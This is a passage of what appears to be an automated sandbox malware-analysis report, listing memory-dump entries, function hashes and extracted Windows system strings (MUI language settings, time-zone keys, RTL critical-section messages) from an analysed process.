                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b34cb9bedde95fdc994ce97802ba12d5c0db0773172be4f358f5ebf5e3f3b180
                                                                                                                                                                                    • Instruction ID: 71cd0b4ea5b82251a8dfacf4b4f4a81eb47669f17a6830740459b1cdfa128c40
                                                                                                                                                                                    • Opcode Fuzzy Hash: b34cb9bedde95fdc994ce97802ba12d5c0db0773172be4f358f5ebf5e3f3b180
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7A022A0C0830C03002030FA2B03023B30CC000028F0003EAAE8C022023C02A83200EB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: [Pj
                                                                                                                                                                                    • API String ID: 0-2289356113
                                                                                                                                                                                    • Opcode ID: ad5027ff16efdc65b69baa8a45fb05458cd2427a154001173cd43d766673b5e7
                                                                                                                                                                                    • Instruction ID: 083143678055d90f46a13592775bd6e5d06212fc7afef3adc05d52e43cb7a3cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad5027ff16efdc65b69baa8a45fb05458cd2427a154001173cd43d766673b5e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF0CD31204344ABEB22AB14CC85F2A7FA9EF85745F148818FD816A0D3C762C829E731
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                    • Instruction ID: 168be04370a1b2dc1924c4aa23b1b40ab5ca3f07c30eb36f21ef0c33b9da7372
                                                                                                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44F0C221324599EBDB4CEA189E5277A33D5EB94300F58C079ED8DC7251F631DE4082B0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                    • Instruction ID: a0f3bf56bc19ff370c57e7e2bc9dedef89accf6340228bce574ef7eb5a426097
                                                                                                                                                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0FE72240304DFCB5CCF08C490BFA7BA6AB90755F24446DE50BCF691D735D941DA65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62f2b429010fabb940d2085b1dceb5ec44ae71804a7f5491a852a2e0678c08b2
• Instruction ID: 2f81947ec032acf8b5f1306df613b616acf8ca4e31e2f226a5b53feec4f7baea
• Opcode Fuzzy Hash: 62f2b429010fabb940d2085b1dceb5ec44ae71804a7f5491a852a2e0678c08b2
• Instruction Fuzzy Hash: FFE01AB1544B81CBD311DF14D901B1AB7E5FF89B11F15483AFC0597790D7789A09C972
APIs
Strings
• Kernel-MUI-Language-Allowed, xrefs: 00D88827
• Kernel-MUI-Number-Allowed, xrefs: 00D887E6
• Kernel-MUI-Language-SKU, xrefs: 00D889FC
• WindowsExcludedProcs, xrefs: 00D887C1
• Kernel-MUI-Language-Disallowed, xrefs: 00D88914
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: _wcspbrk
• String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
• API String ID: 402402107-258546922
• Opcode ID: bd4c93d1791abfd131164d346fbf6422c30d60d567b444258fd9b58359b519a4
• Instruction ID: 18a26010ab0aca5f856463473095b4177a62b90a2f889cf3151be417f637a260
• Opcode Fuzzy Hash: bd4c93d1791abfd131164d346fbf6422c30d60d567b444258fd9b58359b519a4
• Instruction Fuzzy Hash: C5F1E5B6D00249EFCF11EF99C9819EEB7B9FF08300F55446AE505A7211EB34AA45EB70
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: _wcsnlen
• String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
• API String ID: 3628947076-1387797911
• Opcode ID: 17cbc8ee5c4eec1bf0166d076f608062996281c9a3e88e5b140adae611c06d5f
• Instruction ID: 9fd5fd6ab1aa20a63224dd830a60689777fa4b2a10afbf38ae4cb2aab99c99ff
• Opcode Fuzzy Hash: 17cbc8ee5c4eec1bf0166d076f608062996281c9a3e88e5b140adae611c06d5f
• Instruction Fuzzy Hash: 2541937624034DBEEB019A90CC42FFE77ACEF04B44F158112BB05DA191DBB0DA54A7B6
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 6745dde291602608bf38379e4d6122a4a149f0167eb0eaaa02926f9ed3d5c099
• Instruction ID: 38734b4b035864539be80325c6182efac972c6fcb45bf58fe16cf366d38e5360
• Opcode Fuzzy Hash: 6745dde291602608bf38379e4d6122a4a149f0167eb0eaaa02926f9ed3d5c099
• Instruction Fuzzy Hash: 3C6134B9904656AACF34CF9DC8908BEBBB5EF9A300B18C12DF4D647640D774AA40CB70
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 4c3facfdd658ba6657a1135ea5b89240f7ba228594c9f197df8a3e644a9541ad
• Instruction ID: d1791e1e404701db1e2600d5ce7b27c50ce975ff08eb2ccb229099046cc441bf
• Opcode Fuzzy Hash: 4c3facfdd658ba6657a1135ea5b89240f7ba228594c9f197df8a3e644a9541ad
• Instruction Fuzzy Hash: 6A619376900644AFDF24DF69C9804BEBBF9EF54314B14D52AF8A9B7181E234DB809B60
APIs
• BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00DB3F12
Strings
• Execute=1, xrefs: 00DB3F5E
• ExecuteOptions, xrefs: 00DB3F04
• 'i, xrefs: 00D97F1E
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DB3F4A
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DBE2FB
• Rw, xrefs: 00D97F08
• CLIENT(ntdll): Processing section info %ws..., xrefs: 00DBE345
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DB3F75
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DB3EC4
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: BaseDataModuleQuery
• String ID: Rw$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'i
• API String ID: 3901378454-972555932
• Opcode ID: ddba7a399336a99a0c6942f2501a88d1cd6a1ba90d68f59b9cf101c0aa62a325
• Instruction ID: 24d7aebb92513517e98abe8c9ee55f8f45d5835244a293b84c60225f66962221
• Opcode Fuzzy Hash: ddba7a399336a99a0c6942f2501a88d1cd6a1ba90d68f59b9cf101c0aa62a325
• Instruction Fuzzy Hash: 15418571A8061CBBDF209E94DC86FEA73BCAF58700F0405A9B505F6191EA70DA499B71
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: 62d4fb523e384cdefbba2d75617b5d101f0b7f371bdc0c7e19781c2a89c49889
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61A17C71D0030AEFDF24DF64C8456BEBBB5EF06314F28856AD852A7282D7349A41CBB1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC2206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                                                    • Opcode ID: 1bfdc6eda746bd708a7cb2fdb135ac73b063e86b9fbe52e311bd366de4f25499
                                                                                                                                                                                    • Instruction ID: 37b94fdffbc54cda5c30db5a500be16a900ffdffd81078c23f9c8180a17fed8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bfdc6eda746bd708a7cb2fdb135ac73b063e86b9fbe52e311bd366de4f25499
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7512871B002026FEB159A18CC81FB673A9EF99710F29422DFD45DB285DA71EC418BB4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00DCEA22
                                                                                                                                                                                      • Part of subcall function 00DA13CB: ___swprintf_l.LIBCMT ref: 00DA146B
                                                                                                                                                                                      • Part of subcall function 00DA13CB: ___swprintf_l.LIBCMT ref: 00DA1490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 00DA156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$%%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-914787948
                                                                                                                                                                                    • Opcode ID: 236f84a24b3be70e2ff2a3b19a4abd00bdd40fc9ea7c371a3b0383e1b86857c8
                                                                                                                                                                                    • Instruction ID: c56c91b53f4930d6db16644f1d8fddc803de21edb9053f98a787f19c709ecbd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 236f84a24b3be70e2ff2a3b19a4abd00bdd40fc9ea7c371a3b0383e1b86857c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4218F76D00219AFCF20DE58CC41AEAB3BCEB91710F484565F846E3141DB70EA598BF1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$%%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-914787948
                                                                                                                                                                                    • Opcode ID: f54ea4ba67c6067eac711a6306eb5efb397248bd24e9ba52158a51344ed67d97
                                                                                                                                                                                    • Instruction ID: 128ab80efc93106760f6ca52f20f4395f2e3267e68398a6eff941c44efb46a1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f54ea4ba67c6067eac711a6306eb5efb397248bd24e9ba52158a51344ed67d97
                                                                                                                                                                                    • Instruction Fuzzy Hash: F021AFB690021AABCB20AE79CD459EF77ACDB14758F041625FC08F3281E7749E99C7E1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC22F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00DC22FC
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00DC2328
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 00DC230B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 8d836a0c72430c957369b518a1204147e7e23695cff11b80fb583054b749e198
                                                                                                                                                                                    • Instruction ID: 42b55c47ea5752ccfc38324e16beb89e614f734b03c5d6c88ff9e5dd865801f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d836a0c72430c957369b518a1204147e7e23695cff11b80fb583054b749e198
                                                                                                                                                                                    • Instruction Fuzzy Hash: 765127716007026BDF11EB28DC81FA77399EF59360F104229FD49DB285EA71ED418BB0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00DC24BD
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00DC248D
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 00DC24FA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID:
• String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
• API String ID: 0-3177188983
• Opcode ID: 50d56dae303784b0b1b2fa34b98b54d96a4216e3d2055f9ec06f26be768cb466
